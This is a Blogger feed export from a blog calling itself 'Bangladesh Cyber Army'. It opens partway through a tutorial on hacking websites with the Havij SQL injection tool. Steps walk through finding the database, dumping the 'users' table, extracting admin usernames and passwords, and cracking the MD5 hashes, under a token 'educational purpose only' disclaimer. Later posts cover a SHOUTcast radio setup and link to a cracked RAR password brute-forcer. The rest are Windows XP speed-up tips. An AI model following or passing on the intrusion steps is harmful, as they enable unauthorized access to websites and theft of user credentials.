&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/b&gt;&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 4:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Then It shows some messages there. Be alert on it and be show patience for sometime to find it's&amp;nbsp;vulnerable&amp;nbsp;and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 5:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Then Move to another operation to find tables by clicking "tables" as figure shown. Now click "Get tables" Then wait some time if needed&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Step 6:&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 7:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;In that Just put mark username and password and click "Get data"&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Finally you got now username and password of the admin...&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;The pass will get as md5 you can crack it also using this tool as shown in figure..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&lt;b&gt;&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;center&gt;
&lt;b&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Remember Hacking Is Crime.This tutorial is Educational purpose only.Do not Misuse It.'); return true" type="button" value="Remember" /&gt;
&lt;/form&gt;
&lt;/b&gt;&lt;/center&gt;
&lt;b&gt;
&lt;!-- End of Message Alert --&gt; &lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/4139384894629238411/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=4139384894629238411&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4139384894629238411?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4139384894629238411?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/web-site-hacking-using-havij-sql.html' title='Web Site Hacking Using Havij SQL Injction Manual !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-h7L1dkyoFSA/UIACiNWnu8I/AAAAAAAAAO8/hH_6MVlKj3I/s72-c/sql_injection.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;A0MFQH05eyp7ImA9WhNTFE0.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-927154816442651737</id><published>2012-10-16T23:42:00.002+06:00</published><updated>2012-10-16T23:43:31.323+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T23:43:31.323+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>How To make your own Radio Station ...</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello Visitor&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-vHcnpakqhjs/UH2cZngTCyI/AAAAAAAAANY/_TsNLi60tVU/s1600/online-world-radio.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="245" src="http://2.bp.blogspot.com/-vHcnpakqhjs/UH2cZngTCyI/AAAAAAAAANY/_TsNLi60tVU/s320/online-world-radio.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Today I will How to &lt;span style="color: #38761d;"&gt;&lt;b&gt;How To make your own Radio Station .U must do it Absolutely Free and Safely.&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;Must HAVE Winamp (Require 5.5 Or Updated )&lt;br /&gt;&lt;br /&gt;First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)&lt;br /&gt;&lt;br /&gt;Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)&lt;br /&gt;&lt;br /&gt;Now, Your gonna have to download the Shoutcast Files.&lt;br /&gt;&lt;br /&gt;Go to&lt;br /&gt;&lt;a href="http://www.shoutcast.com/"&gt;www.shoutcast.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;to get the files.Or Download Hare 3 Software &lt;a href="http://download.nullsoft.com/shoutcast/tools/sc_serv2_win32_07_31_2011.exe" target="_blank"&gt;File-1&lt;/a&gt; , &lt;a href="http://download.nullsoft.com/shoutcast/tools/shoutcast-dsp-2-3-1-windows.exe" target="_blank"&gt;File-2&lt;/a&gt; and &lt;a href="http://download.nullsoft.com/shoutcast/tools/sc_trans_win32_10_07_2011.exe" target="_blank"&gt;File-3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ok After downloading these, installing Both of them in any order i dnt care. Go to &lt;span style="color: magenta;"&gt;START&amp;gt;PROGRAM FILES&amp;gt;SHOUTcast DNAS&amp;gt;EDIT SHOUTCAST DNS CONFIG.&lt;/span&gt;&lt;br /&gt;Ok your gonna have to Configure it:&lt;br /&gt;Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)&lt;br /&gt;&lt;br /&gt;The Portbase: change it to whatever port you want it&lt;br /&gt;Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: magenta;"&gt;EDIT&amp;gt;SAVE.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Open winamp, &lt;span style="color: magenta;"&gt;RIGHT CLICK&amp;gt;OPTIONS&amp;gt;PREFRENCES&amp;gt;DSP EFFECT&amp;gt;&lt;/span&gt; and choose the &lt;span style="color: magenta;"&gt;NULLSOFT SHOUTCAST.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through&lt;br /&gt;Code:&lt;a href="http://www.no-ip.com/"&gt;www.no-ip.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PORT NUMBER, whatever u did in the EDIT.txt, and your password.&lt;br /&gt;&lt;br /&gt;Then go to Encoder, and choose your quality of your music. Go back to O&lt;span style="color: magenta;"&gt;UTPUT&amp;gt;OUTPUT CONFIG&amp;gt; YELLOW PAGES&lt;/span&gt;. this is your advertisemant information. dow hatever you like there.&lt;br /&gt;&lt;br /&gt;Now Connect. to check that your Radio os on-line go to http://yoursite.com (your address that you added in the prefrence).That's it.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;center&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Stay Connected with us and Get More knowlage.Bangladesh Cyber Army All Rights Reserved'); return true" type="button" value="Thanks For Reading" /&gt;
&lt;/form&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/center&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;
&lt;!-- End of Message Alert --&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/927154816442651737/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=927154816442651737&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/927154816442651737?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/927154816442651737?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/how-to-make-your-own-radio-station.html' title='How To make your own Radio Station ...'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-vHcnpakqhjs/UH2cZngTCyI/AAAAAAAAANY/_TsNLi60tVU/s72-c/online-world-radio.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;Ck8MQXg7fip7ImA9WhNTE04.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4800510019067886810</id><published>2012-10-16T01:54:00.003+06:00</published><updated>2012-10-16T01:54:40.606+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T01:54:40.606+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='All kind of software unlock'/><title>RAR ARCHIVE PASSWORD CRACKER !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;a href="http://2.bp.blogspot.com/_6U4LPE0hPOw/TCMZRYErEcI/AAAAAAAAAFM/sO0BY4Nof-M/s1600/rar.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_6U4LPE0hPOw/TCMZRYErEcI/AAAAAAAAAFM/sO0BY4Nof-M/s320/rar.png" style="height: 170px; width: 177px;" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h3 class="post-title entry-title"&gt;
&lt;span style="color: #cc0000;"&gt;RAR ARCHIVE PASSWORD CRACKER&lt;/span&gt;
&lt;/h3&gt;
&lt;div class="post-header"&gt;

&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Many times the free software or books you download 
online are rar archives which are password protected.first they fool you and 
allow you to download the files saying that they are absolutely free but when 
you try to decompress them they ask you for a password and tell you to visit 
some site to get the password.this really sucks. you cant do anything but to 
visit the site or just delete the file in frustration but there is one more 
option, you can try to crack the password first of all let me tell you there are 
no such software as rar password remover there are software which can brute 
force the password but cant remove it instantly.here is one such password 
cracker&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: 130%;"&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;RAR PASSWORD 
REMOVER&lt;/span&gt;&lt;/span&gt;

&lt;br /&gt;&lt;a href="http://www.blogger.com/blogger.g?blogID=4817158780573687609" name="more"&gt;&lt;/a&gt;
&lt;a href="http://1.bp.blogspot.com/_6U4LPE0hPOw/TUgmNBrdTdI/AAAAAAAAAKM/T4ONwrjUKdw/s1600/Untitled.jpg" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="190" src="http://1.bp.blogspot.com/_6U4LPE0hPOw/TUgmNBrdTdI/AAAAAAAAAKM/T4ONwrjUKdw/s320/Untitled.jpg" width="260" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;
Don't go on the name, it 
is not a password remover but a cracker it uses dictionary attack and bruteforce 
attack to crack RAR passwords.&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;a href="http://downloads.ziddu.com/downloadfiles/13635893/RARPasswordRemoverv1.1CrackByC" target="_blank"&gt;Download Hare&lt;/a&gt;&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/4800510019067886810/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=4800510019067886810&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4800510019067886810?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4800510019067886810?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/rar-archive-password-cracker.html' title='RAR ARCHIVE PASSWORD CRACKER !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_6U4LPE0hPOw/TCMZRYErEcI/AAAAAAAAAFM/sO0BY4Nof-M/s72-c/rar.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkIGQn07eyp7ImA9WhNTE04.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-7730012452951406380</id><published>2012-10-16T01:48:00.002+06:00</published><updated>2012-10-16T01:48:43.303+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T01:48:43.303+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Windows computer tips'/><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><title>Make your pc faster Guarnted using simple Tips !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp;Hello Visitor,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Today I'll Explain how to Make your pc faster Guarnted&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-yDe1pRevKbE/UHxkyOG3GSI/AAAAAAAAAMw/XjxRQplRUQI/s1600/computer-RUN-FASTer.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://1.bp.blogspot.com/-yDe1pRevKbE/UHxkyOG3GSI/AAAAAAAAAMw/XjxRQplRUQI/s320/computer-RUN-FASTer.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;1. First, run a scandisk or checkdisk. Let Windows fix any errors.&lt;br /&gt;&lt;br /&gt;2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.&lt;br /&gt;&lt;br /&gt;3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.&lt;br /&gt;&lt;br /&gt;4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)&lt;br /&gt;&lt;br /&gt;5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.&lt;br /&gt;&lt;br /&gt;6. Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)&lt;br /&gt;&lt;br /&gt;7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.&lt;br /&gt;&lt;br /&gt;8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non-essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.&lt;br /&gt;&lt;br /&gt;9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1x, instead of being used at 4x!&lt;br /&gt;&lt;br /&gt;10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;-FOR ADVANCED USERS-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1. Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).&lt;br /&gt;&lt;br /&gt;2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...&lt;br /&gt;&lt;br /&gt;3. Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!&lt;br /&gt;&lt;br /&gt;4. Take a look under the hood (for SCSI owners) What kind of SCSI do you have? If it's the newer Ultra 160/320 etc cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain...this means that if you have say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 mb/sec) on the same chain as a SCSI cdrom drive (capable of only 40 mb/sec) then the whole bus slows down to the 40 mb/sec speed...use different chains for the slower devices and maximize those hard drives!&lt;br /&gt;&lt;br /&gt;5. Run a utility like WCPUID and check the settings...is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)&lt;br /&gt;&lt;br /&gt;6. Dig in to the BIOS...check settings like boot order, for example...is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on board peripherals...for instance, - does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your systems' performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps...Also, check to see what your video aperature is set to. If you have a video card with 128 megs of on-baord memory, your aperature should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?&lt;br /&gt;&lt;br /&gt;7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware componenet that is not working correctly.&lt;br /&gt;&lt;br /&gt;8. Evaluate the potential for system/hardware upgrades...usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8x - capable AGP port but you are using an older 4x video card, consider upgrading to an 8x card. You get the idea here...&lt;br /&gt;&lt;br /&gt;9. Quit using software pigs like Norton system utilities, etc. These place files everywhere and can be a real system resource hog on lower end PCs.&lt;br /&gt;&lt;br /&gt;10. Did I mention to make a good backup? Do it now! Also, while you're at it, run a good virus program with the latest definitions.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;There are 27 easy steps. it might take a
 bit long to apply them all&amp;nbsp;especially if you’re not familiar with 
windows registry, but trust me&amp;nbsp;it worth it.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Ok now here it goes…read carefully… coz i wont accept any&amp;nbsp;questions about it…&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;1.. Visual effects should be set to a minimum.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;Start &amp;gt; Settings &amp;gt; Control Panel 
&amp;gt; System &amp;gt; Advanced &amp;gt; Performance&amp;nbsp;Settings &amp;gt; Visual Effects 
Tab &amp;gt; Adjust for best performance&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;2. Switch Off Desktop Background Image&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Right Click Desktop &amp;gt; Properties &amp;gt; Desktop Tab &amp;gt; Background None&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;3. Disable Screen Saver&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Right Click Desktop &amp;gt; Properties &amp;gt; Screen Saver &amp;gt; None&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;5. Disable Fast User Switching&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; User Accounts &amp;gt; Change 
the way&amp;nbsp;users log on or off &amp;gt; Untick Use Fast User Switching&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;6. Switch Off Power Schemes&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Power Options &amp;gt; Always On &amp;gt; Turn&amp;nbsp;off monitor and turn off hard discs to Never&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;7. Switch Off Hibernation&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Start &amp;gt; Settings &amp;gt; Control Panel &amp;gt; Power Options &amp;gt; Hibernate &amp;gt; Untick&amp;nbsp;Hibernation&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;8. Activate DMA on Hard Discs/CD ROMS&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
